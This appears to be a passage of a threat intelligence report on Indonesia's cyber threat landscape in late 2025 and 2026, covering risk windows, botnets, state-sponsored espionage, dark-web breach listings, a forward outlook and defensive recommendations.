10DX Summit Indonesia (February 10, 2026, Jakarta): Bringing together banking and technology leadership to focus on digital infrastructure execution, scaling AI, and partnering with super-apps, this summit represented a concentrated environment of high-value targets among Indonesia’s banking and fintech sector. Credential harvesting, spear-phishing against attendees, and targeted social engineering operations against participating financial institutions were assessed as elevated risks around this event window. Attendee devices, event Wi-Fi infrastructure, and organizer communication channels warranted elevated threat posture during this period.

National Tax Season Window (January to March 2026): The Coretax fraud campaign’s deliberate timing to coincide with Indonesia’s national tax filing season demonstrated that threat actors actively monitor regulatory and seasonal calendars to maximize attack surface exploitation. The convergence of 67 million potential targets engaging with digital tax platforms created the conditions for industrialized fraud deployment at population scale. This window represents a recurring, predictable elevated risk period for Indonesian financial institutions, tax authorities, and citizens.

IndoSec 2026 (September 15 to 16, 2026, Jakarta Ritz-Carlton Pacific Place): Indonesia’s largest and most prestigious cybersecurity summit represents a concentrated environment of security leadership, critical infrastructure operators, and government officials. The public release of threat outlooks and vulnerability discussions at such events creates an intelligence windfall for adversaries that publicly documents identified weaknesses and sector-specific defensive gaps, with increased reconnaissance activity against highlighted targets anticipated in the weeks following the event.

Regulatory and Policy Milestones

Cybersecurity and Cyber Resilience Bill Harmonization Window: The Bill’s entry into inter-ministerial harmonization with the Ministry of Law beginning in May 2025, with enactment still pending as of the most recent regulatory tracking, has created an extended transition period representing a window of elevated risk. Organizations in early stages of compliance preparation presented softer security postures, and threat actors aware of the regulatory timeline may deliberately time operations to exploit the gap between legislative enforcement and operational security maturity across newly covered critical infrastructure operators.

Personal Data Protection Agency Operational Launch (Targeted 2026): The establishment of Indonesia’s dedicated PDP Agency represents a significant regulatory milestone with direct implications for how personal data breaches are investigated, reported, and enforced. The transition period as the agency assumes functions from the Directorate General of Digital Space Supervision creates temporary ambiguity in enforcement authority that sophisticated actors operating in Indonesia’s data ecosystem may seek to exploit before the agency reaches full operational capacity.

National Data Center Program Expansion: Indonesia’s EUR 164 million National Data Center program (Cikarang facility, Phase I), aimed at consolidating government digital infrastructure, represents both a security opportunity and a risk concentration point. The consolidation of government data into centralized infrastructure improves consistency of security controls but simultaneously creates a higher-consequence single target for ransomware operators and state-sponsored actors, consistent with the pattern observed in the 2024 Pusat Data Nasional ransomware incident that disrupted 282 government agencies.

Geopolitical Flashpoints Creating Elevated Hacktivist Risk

ASEAN Summit Cycle (2026): Indonesia’s sustained ASEAN engagement creates recurring windows of elevated hacktivist and state-sponsored activity. Political flashpoints related to South China Sea territorial dynamics, Indonesian foreign policy positioning, and regional security discussions have historically triggered spikes in hacktivist DDoS campaigns, website defacements, and targeted intrusion attempts against government and diplomatic infrastructure. Any escalation in regional tensions during 2026 would be expected to drive corresponding increases in cyber operational tempo against Indonesian government and military-adjacent targets.

BOTNET ACTIVITY IN INDONESIA

Indonesia remains one of the most botnet-affected countries in Southeast Asia, functioning both as a major source of compromised infrastructure and a frequent target of opportunistic botnet activity. As of early May 2026, Indonesia ranked 7th globally for botnet-related compromise activity, with approximately 68,000–85,000 active compromised IPs involving routers, DVRs, IP cameras, and Android-based IoT devices. Weak/default credentials, outdated firmware, and the widespread use of low-cost consumer IoT hardware continue to drive infections and large-scale malware propagation. During 2025 and early 2026, the Aisuru and Kimwolf Mirai-derived botnets infected an estimated 1–4 million devices globally, including significant infections in Indonesia, enabling massive DDoS attacks exceeding 200 million requests per second and reaching approximately 31.4 Tbps while also operating as DDoS-for-hire infrastructure through underground channels.

On 19 March 2026, international law enforcement disrupted the command-and-control infrastructure associated with Aisuru and Kimwolf; however, millions of vulnerable devices remained exposed to re-infection and successor malware campaigns. Following the takedown, new Mirai variants rapidly emerged, including Nexcorium, exploiting CVE-2024-3721 in TBK DVR devices, and Tuxnokill, targeting end-of-life D-Link routers via CVE-2025-29635. These botnets continue automated scanning, exploitation, and recruitment activity globally, including against Indonesian infrastructure. CYFIRMA assesses with moderate confidence that Indonesia will remain exposed to sustained IoT botnet and DDoS activity throughout 2026 due to the large population of vulnerable internet-exposed devices and persistent low security maturity across consumer IoT ecosystems.

GEOPOLITICAL CONTEXT AND INDONESIA’S THREAT ENVIRONMENT

Indonesia occupies a strategically important position at the intersection of the Indian and Pacific Oceans, serving as Southeast Asia’s largest economy and a pivotal member of ASEAN. The country’s threat landscape is shaped by its role as a major emerging market, its extensive natural resource base (particularly critical minerals including nickel, cobalt, and bauxite), its democratic governance structure, and its positioning within the intensifying strategic competition between China and the United States in the Indo-Pacific region.

Indonesia’s official posture of strategic autonomy, maintaining substantive relationships with both Washington and Beijing while resisting alignment with either power’s bloc, makes it a target for intelligence collection by both sides of the geopolitical divide. Chinese state-aligned actors seek intelligence on Indonesia’s foreign policy deliberations, ASEAN coordination positions, and bilateral negotiation postures. Western intelligence partners, while not discussed in the same adversarial framing, create their own pressures on Indonesia’s data sovereignty through the broad collection mandates of Five Eyes-aligned operations across the region.

Indonesia’s critical mineral wealth, particularly its nickel reserves, sits at the center of a geopolitical contest over supply chain control for battery technology and electric vehicle manufacturing. APT41 and APT groups with Chinese strategic economic mandates-maintained targeting of Indonesia’s mining and energy sectors throughout the reporting period, consistent with Beijing’s industrial policy interest in ensuring access to or intelligence about key resource supply chains. Indonesia’s policies on downstream processing requirements for nickel exports are directly relevant to Chinese industrial strategy, creating intelligence collection motivation that extends beyond traditional espionage into economic intelligence gathering.

The country’s democratic governance, active civil society, and independent media created an additional dimension of targeting. State-aligned actors from China and North Korea monitored civil society organizations, journalists, academic institutions, and think tanks engaged in analysis of regional security dynamics and human rights issues. Indonesia’s role in ASEAN consensus formation and its positions on issues including maritime territorial disputes and South China Sea navigation rights made it a target for intelligence collection by multiple state actors simultaneously.

Indonesia recorded 5.5 billion cyberattacks in 2025, a 714 percent increase against the prior four-year annual average. Presidential Chief of Staff Dudung Abdurachman confirmed in June 2026 that these attacks specifically targeted government infrastructure, the economy, and national security. The cybersecurity market, valued at $1.35 billion in 2025 and growing at a projected CAGR of over 20 percent through 2031, reflects growing institutional awareness of the threat environment. However, current security investment remains structurally insufficient relative to the scale of Indonesia’s digital economy and the persistence of the adversarial pressure it faces.

Indonesia’s rapid digitalization under the Making Indonesia 4.0 initiative, combined with the adoption of BI-FAST real-time payments, QRIS merchant codes, and the National Data Center program, has materially widened the attack surface while simultaneously creating high-consequence targets. The concentration of government digital services in centralized data infrastructure, demonstrated as a critical vulnerability in the 2024 Pusat Data Nasional ransomware incident, remains a structural risk as the National Data Center program expands.

Given Indonesia’s political importance as the world’s third-largest democracy and its strategic centrality in ASEAN, any escalation in regional tensions involving the South China Sea, Taiwan, or the broader US-China strategic competition would be expected to generate significant cyber and informational spillover effects against Indonesian government, military-adjacent, and critical infrastructure targets. Cyber operations offer state actors a means of collecting intelligence and applying pressure below the threshold of overt confrontation, consistent with the full-spectrum competition dynamics characterizing the contemporary Indo-Pacific security environment.

MAJOR DARK-WEB INCIDENTS

On May 28, 2026, a threat actor allegedly claimed to have targeted Political party based in Indonesia. The alleged breach sample contains 4GB data.

On May 27, 2026, a threat actor advertised the sale of data allegedly belonging to an Indonesian healthcare application on an underground telegram channel. The threat actor claimed that the dataset contains information on approximately 192,000 users, including 105,000 unique email addresses, 121,000 unique phone numbers, 19,000 unique KTP numbers, and 45,000 unique insurance policy records. The exposed data reportedly includes IP addresses, policy numbers, bcrypt-hashed passwords, email addresses, phone numbers, dates of birth, full names, and additional personal information. The dataset was offered for sale at USD 200. The threat actor did not disclose the source of the data or how it was obtained.

On May 17, 2026, a post on an underground forum advertised an alleged data breach involving an Indonesian state-owned enterprise that manages fisheries, port operations, and aquaculture activities. The threat actor claimed that the dataset contains 252 records, including Indonesian national identity numbers (NIK), driver’s license numbers (SIM), passport numbers, family card numbers (KK), BPJS numbers, NPWP numbers, NISN numbers, NIM numbers, phone numbers, and email addresses. The source of the data and the method by which it was obtained were not disclosed.

On May 6, 2026, a post on an underground forum advertised an alleged data breach involving an official Indonesian government website. The threat actor claimed to possess a database containing 2,006 personnel records, with a reported data size of 31.78 MB. The dataset was reportedly provided in JSON format and includes information such as rank, full name, duty or position, phone number, email address and more. The source of the data and the method by which it was obtained were not disclosed.

On April 30, 2026, a post on an underground forum advertised an alleged data breach involving integrated data system operated by the Education and Culture Office of Indonesia. The platform is used to monitor and evaluate educational institutions, educators, education personnel, students, educational facilities and infrastructure. The threat actor claimed to possess data associated with the platform; however, the volume of the data and the method by which it was obtained were not disclosed.

CONCLUSION

Indonesia’s threat environment has matured beyond opportunistic exploitation into a sustained, multi-actor campaign landscape where financially motivated and state-sponsored adversaries operate simultaneously, with increasing precision and local calibration. Threat actors demonstrated detailed awareness of Indonesia’s regulatory calendar, domestic policy decisions, tax season cycles, and procurement events, using this knowledge to time and craft intrusions for maximum impact and credibility.

Several structural conditions continue to favour adversaries. The gap between Indonesia’s rapid digital expansion and its security investment levels remains wide. Consumer IoT infrastructure is extensively compromised and quickly re-exploited following takedowns. The regulatory transition period creates enforcement ambiguity that sophisticated actors are positioned to exploit. And the sustained availability of Indonesian citizen and institutional data in underground markets provides persistent targeting infrastructure for downstream fraud and intrusion operations.

Organizations operating in Indonesia must move from reactive postures to intelligence-led, proactive security operations. The threat environment will not stabilize in the near term. Actors will continue to adapt, retool, and find new vectors. Resilience, early detection, and continuous threat intelligence operationalization are the minimum requirement for organizations seeking to reduce exposure in this environment.

FORWARD OUTLOOK

The threat environment facing Indonesian organizations is assessed to intensify across all major categories through the second half of 2026 and into 2027. The structural conditions that made Indonesia a high-priority target during the December 2025 to May 2026 reporting period, including rapid digital expansion outpacing security investment, extensive unpatched IoT infrastructure, a regulatory framework in transition, and a large internet-connected population with relatively low security awareness, will remain in place and will continue to be systematically exploited by adversaries with demonstrated knowledge of the Indonesian environment.

Ransomware Operations Will Expand in Sophistication and Sectoral Reach
The emergence of LockBit5 and CoinbaseCartel as leading operators during the reporting period signals a generational shift in the RaaS ecosystem toward more resilient, decentralized affiliate models that are harder to disrupt through single takedown operations. Triple-extortion pressure incorporating DDoS alongside encryption and data leak threats is expected to become standard practice. Critical infrastructure sectors including energy, water utilities, and transportation, which recorded lower incident volumes during the reporting period but carry the highest consequence potential, are assessed as priority targets for escalating ransomware attention through 2026 to 2027, consistent with the global trajectory of RaaS operator target selection.

State-Sponsored Espionage Will Deepen Against Strategic Sectors
Chinese state-linked actors including Mustang Panda, APT41, and Lotus Blossom will sustain and likely intensify operations against Indonesian government, critical minerals, telecommunications, and maritime sectors. Indonesia’s nickel and critical minerals policy, its ASEAN leadership role, and its bilateral relationships with both Washington and Beijing ensure it remains a durable intelligence collection priority. The demonstrated willingness of actors such as Amaranth-Dragon to calibrate intrusion campaigns to Indonesia’s domestic policy calendar confirms that adversary intelligence about the Indonesian operating environment is detailed and continuously updated. Supply chain compromise as an initial access vector is expected to increase as perimeter defenses improve and direct exploitation becomes more resource intensive.

AI-Enabled Attack Capability Will Become Mainstream
AI-assisted phishing, deepfake-enabled social engineering, and adaptive malware evasion, each documented during the reporting period, are expected to transition from emerging to standard attack tooling through 2026 to 2027. The democratization of AI-generated lure creation will reduce the skill threshold required for high-credibility spear-phishing, expanding the pool of actors capable of conducting convincing targeted campaigns against Indonesian executives, government officials, and citizens. Deepfake audio and video used in financial fraud and disinformation operations will increase in volume and quality, with Indonesian-language deepfake capability specifically assessed as a growth area given the commercial interest of fraud operators in Indonesia’s large digital banking population.

Mobile Banking Fraud Will Remain a Population-Scale Threat
The Coretax campaign’s exploitation of Indonesia’s tax filing season established a template that financially motivated actors will replicate against other high-engagement government digital services including social security (BPJS), fuel subsidy platforms, and digital identity infrastructure. SURXRAT V5’s malware-as-a-service distribution model, operated domestically and sold to global resellers, indicates that Indonesia is developing an indigenous mobile fraud capability ecosystem that will generate new tooling and campaign variants independent of external actor direction. Android-targeted attack chains will continue to evolve in response to banking application security improvements, with accessibility service abuse, overlay attacks, and OTP interception remaining primary techniques.

Botnet Infrastructure Will Continue to Regenerate
The rapid emergence of Nexcorium and Tuxnokill following the March 2026 disruption of Aisuru and Kimwolf confirmed that takedown operations alone are insufficient to resolve Indonesia’s botnet exposure. The underlying conditions driving infection, including millions of consumer IoT devices running end-of-life firmware with default credentials and no patch management, will persist until ISP-level remediation programs and mandatory security baseline requirements for consumer IoT devices are implemented at regulatory scale. Indonesia’s compromised IoT infrastructure will continue to serve as attack staging, DDoS capacity, and proxy infrastructure for both domestic and internationally operated threat actors through 2026 and beyond.

The Regulatory Transition Window Represents a Near-Term Exploitation Opportunity
The period between the anticipated enactment of the Cybersecurity and Cyber Resilience Bill and the full operational maturity of the Personal Data Protection Agency represents the most consequential near-term risk window for Indonesian organizations and government entities. Sophisticated actors with awareness of Indonesia’s regulatory timeline will assess this period as one of reduced enforcement pressure and organizational focus diverted to compliance preparation rather than threat detection. Organizations should treat the transition period as a period of elevated operational risk rather than reduced threat activity, maintaining or increasing security operations tempo while compliance frameworks mature.

Underground Data Markets Will Sustain Downstream Fraud Risk
The volume and diversity of Indonesian citizen and institutional data sets available in underground markets and Telegram channels as of May 2026 will continue to serve as targeting infrastructure for downstream phishing, identity fraud, and account takeover operations well beyond the original breach events. Aggregated data sets combining NPWP taxpayer records, mobile subscriber information, banking credentials, and government personnel data enable threat actors to construct highly credible, personalized fraud campaigns at scale. The downstream fraud risk from data sets already in circulation is assessed as a multi-year exposure that will persist regardless of improvements in upstream breach prevention.

RECOMMENDATIONS

STRATEGIC RECOMMENDATIONS

Enterprise Ransomware Resilience: Strengthen ransomware preparedness through double-extortion response playbooks, executive-level crisis simulations, and immutable offline backup strategies with validated recovery time objectives. Integrate ransomware early-warning indicators and dark web monitoring into enterprise risk dashboards.

Mobile Security and Anti-Fraud Posture: Deploy mobile threat defense solutions and enforce APK sideloading restrictions across managed devices. Implement behavioral analytics for mobile banking transaction monitoring and establish vishing detection capability within fraud operations centers, with targeted user awareness training on Coretax and tax platform impersonation campaign mechanics.

Supply Chain and Third-Party Risk Governance: Implement formal software validation controls including code signing and hash verification for all enterprise software and update packages. Enforce vendor security assessments for remote access and network infrastructure providers and include contractual breach notification obligations for critical third parties.

Cloud and AI Security Governance: Implement AI governance policies restricting sensitive data exposure through externally hosted platforms and strengthen cloud security posture management across all enterprise cloud services. Deploy behavioral analytics to detect anomalous interactions with Dropbox, Twitter/X, and Zimbra, given their confirmed use as C2 channels by active threat actors targeting Indonesian organizations.

Regulatory Compliance Readiness: Conduct gap assessments against the Cybersecurity and Cyber Resilience Bill and PDP Law requirements before enforcement takes effect. Formalize regulatory notification workflows and align cybersecurity investment with confirmed sector-specific threat exposure across finance, government, energy, and telecommunications.

TACTICAL RECOMMENDATIONS

Vulnerability Prioritization and Patch Validation: Immediately validate remediation status for CVE-2026-41940, CVE-2023-20198, CVE-2021-42013, CVE-2017-9841, and CVE-2025-8088, prioritizing Confluence, Ivanti, Cisco IOS XE, and Junos OS deployments. Conduct targeted scanning of all internet-facing assets and monitor authentication logs for bypass attempts and abnormal privilege escalation.

Detection for RAT and Backdoor Activity: Deploy detection rules for confirmed active malware families including SURXRAT V5, Coretax RAT, MIMICRAT, GigaBud.RAT, TGAmaranth RAT, ValleyRAT, ABCDoor, and Sagerunex across endpoint, network, and email security platforms. Monitor for DLL sideloading patterns, ClickFix-style PowerShell execution chains, and anomalous outbound beaconing to cloud platforms.

Credential Theft and Infostealer Defense: Enforce phishing-resistant multifactor authentication across all privileged and remote access accounts and monitor endpoint telemetry for browser credential extraction and mass credential dumping activity. Conduct continuous dark web monitoring for exposed corporate credentials and establish rapid rotation workflows when organizational data appears in underground marketplaces.

Botnet and IoT Infrastructure Defense: Conduct immediate IoT asset discovery to enumerate all internet-exposed routers, DVRs, IP cameras, and Android IoT devices, prioritizing remediation of firmware affected by CVE-2024-3721 and CVE-2025-29635. Segment IoT networks from core enterprise infrastructure and enforce firmware lifecycle management to reduce re-infection risk from successor botnet variants.

OPERATIONAL RECOMMENDATIONS

Continuous Threat Hunting: Conduct monthly intelligence-led threat hunts focused on lateral movement using valid credentials, data staging behavior before exfiltration, ClickFix and Havoc C2 execution chains, cloud identity misuse, and Android accessibility service abuse consistent with confirmed actor tradecraft in Indonesian environments.

Dark Web and Data Leak Monitoring: Maintain continuous monitoring for organization-specific identifiers across dark web forums and Telegram channels, with a rapid validation and notification workflow aligned to PDP Law obligations. Pre-align legal escalation and communications procedures before incidents occur.

Network Segmentation and IoT Hardening: Segment IoT and operational technology networks from core enterprise systems, enforce firmware patch tracking, and monitor for anomalous outbound connections from non-traditional endpoints. Conduct periodic asset discovery exercises to identify unmanaged devices introduced outside formal security assessment processes.

Executive and Mobile Security Controls: Deploy mobile threat defense for executives, legal professionals, journalists, and civil society leaders facing elevated zero-click exploit risk. Enforce device patch compliance and sideloading restrictions through mobile device management and deliver targeted awareness training on population-scale mobile fraud campaign mechanics confirmed during the reporting period.